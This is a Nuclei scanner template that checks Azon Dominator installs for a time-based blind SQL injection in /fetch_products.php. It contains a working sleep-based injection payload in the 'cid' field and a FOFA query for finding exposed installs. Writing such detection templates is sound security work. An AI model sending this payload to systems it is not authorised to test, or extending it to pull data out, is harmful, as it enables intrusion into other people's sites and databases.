id: azon-dominator-sqli

info:
  name: Azon Dominator - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
  reference:
    - https://www.exploit-db.com/exploits/52059
    - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Azon Dominator"
  tags: Azon-Dominator

http:
  - raw:
      - |
        @timeout 20s
        POST /fetch_products.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code==500"
          - 'contains_all(body, "id", "name", "save_lists.php")'
        condition: and
# digest: 4a0a00473045022002cb410ea3d9aa9814c8ac7bf9378f33c63652a14a227c9fc47a1fdc9094151402210093cdb96193381ba33b38fdb5e4feb8701ce84ad2f980f35bb569d9012b9b8f14:922c64590222798bb761d5b6d8e72950